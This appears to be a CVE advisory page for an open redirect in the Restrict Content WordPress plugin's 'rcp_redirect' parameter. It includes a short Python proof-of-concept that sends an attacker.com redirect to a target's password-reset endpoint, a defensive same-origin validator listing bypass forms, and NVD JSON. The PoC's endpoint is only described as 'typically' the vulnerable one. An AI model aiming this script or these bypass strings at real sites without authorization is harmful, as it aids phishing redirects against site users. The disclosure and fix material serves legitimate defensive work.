Security Vulnerability Report
CVE-2026-4136 CVSS 4.3 MEDIUM

CVE-2026-4136

Published: 2026-03-20 04:16:51
Last Modified: 2026-04-22 21:32:08

Description

The Membership Plugin – Restrict Content plugin for WordPress is vulnerable to Unvalidated Redirect in all versions up to, and including, 3.2.24. This is due to insufficient validation of the redirect URL supplied via the 'rcp_redirect' parameter. This makes it possible for unauthenticated attackers to redirect users who follow the password reset email to potentially malicious sites if they can successfully trick them into performing an action.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No structured configuration data is available. The affected product and version range are:

Membership Plugin – Restrict Content <= 3.2.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Code for CVE-2026-4136
# Vulnerability: Unvalidated Redirect in Membership Plugin
import requests


def check_redirect(target, malicious_url):
    # The vulnerable endpoint is typically the login or password reset action
    url = f"{target}/wp-login.php"
    params = {
        "action": "lostpassword",
        "rcp_redirect": malicious_url
    }
    try:
        # Send request without following redirects to capture the Location header
        response = requests.get(url, params=params, allow_redirects=False, timeout=5)
        if response.status_code == 302:
            location = response.headers.get('Location')
            if location == malicious_url:
                print(f"[+] Vulnerable! Redirecting to: {location}")
                return True
            else:
                print(f"[-] Redirect found but to a different location: {location}")
        else:
            print("[-] No redirect triggered or exploit failed.")
    except Exception as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    target_site = "http://example.com"  # Replace with target
    evil_site = "http://attacker.com"
    check_redirect(target_site, evil_site)
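The fix for this class of bug is to resolve the redirect parameter against the site's own origin and only ever emit the resolved, same-origin URL. The following is an added example, not code from the advisory or from the Restrict Content plugin: a Python re-implementation of the same-origin check that a parameter like 'rcp_redirect' needs (WordPress itself offers wp_validate_redirect() for this in PHP). SITE_URL and the sample values are constructed for illustration.

```python
from urllib.parse import urljoin, urlsplit

# Constructed sample site; a real deployment would use the site's own home URL.
SITE_URL = "https://example.com"


def validate_redirect(candidate: str, site_url: str = SITE_URL, fallback: str = "/") -> str:
    """Return a same-origin redirect target, or `fallback` if `candidate` would
    leave the site. Always return the *resolved* URL, never the raw parameter,
    so that forms like "https:attacker.com" (which browsers treat as a foreign
    host) are pinned to the site origin before being sent in Location."""
    if not candidate:
        return fallback
    cleaned = candidate.strip().replace("\\", "/")   # browsers treat "\" as "/"
    if any(ord(ch) < 0x20 for ch in cleaned):         # CR/LF/tab smuggling
        return fallback
    # Resolve relative paths against the site so "/account" stays local while
    # a protocol-relative "//attacker.com" becomes an explicit foreign origin.
    resolved = urljoin(site_url.rstrip("/") + "/", cleaned)
    site, target = urlsplit(site_url), urlsplit(resolved)
    if target.scheme not in ("http", "https"):        # javascript:, data:, ...
        return fallback
    try:
        same_port = target.port == site.port
    except ValueError:                                # malformed port, e.g. ":abc"
        return fallback
    # hostname is lower-cased and excludes userinfo, so
    # "https://example.com@attacker.com" compares as attacker.com and is rejected.
    if target.hostname != site.hostname or not same_port:
        return fallback
    return resolved


def classify_rcp_redirects(values):
    """Map each constructed 'rcp_redirect' value to the URL the site would use."""
    return {v: validate_redirect(v) for v in values}


if __name__ == "__main__":
    samples = ["/account", "//attacker.com", "https://example.com@attacker.com/",
               "https:attacker.com", "javascript:alert(1)", "\\\\attacker.com"]
    for raw, final in classify_rcp_redirects(samples).items():
        print(f"{raw!r:45} -> {final}")
```

Returning `resolved` rather than `candidate` is the part that matters: a raw value can pass a naive host comparison and still be parsed by the browser as a different origin.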

References

https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.24/core/includes/login-functions.php#L270
https://plugins.trac.wordpress.org/changeset/3486071/restrict-content
https://www.wordfence.com/threat-intel/vulnerabilities/id/e4cf42d3-9864-440b-8357-36c82cbef28f?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-4136",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T04:16:50.517",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Membership Plugin – Restrict Content plugin for WordPress is vulnerable to Unvalidated Redirect in all versions up to, and including, 3.2.24. This is due to insufficient validation on the redirect url supplied via the 'rcp_redirect' parameter. This makes it possible for unauthenticated attackers to redirect users with the password reset email to potentially malicious sites if they can successfully trick them into performing an action."
      },
      {
        "lang": "es",
        "value": "El plugin Membership Plugin – Restrict Content para WordPress es vulnerable a Redirección no validada en todas las versiones hasta la 3.2.24, inclusive. Esto se debe a una validación insuficiente en la URL de redirección suministrada a través del parámetro 'rcp_redirect'. Esto permite a los atacantes no autenticados redirigir a los usuarios con el correo electrónico de restablecimiento de contraseña a sitios potencialmente maliciosos si logran engañarlos para que realicen una acción."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-640"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.24/core/includes/login-functions.php#L270", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3486071/restrict-content", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4cf42d3-9864-440b-8357-36c82cbef28f?source=cve", "source": "[email protected]"}
    ]
  }
}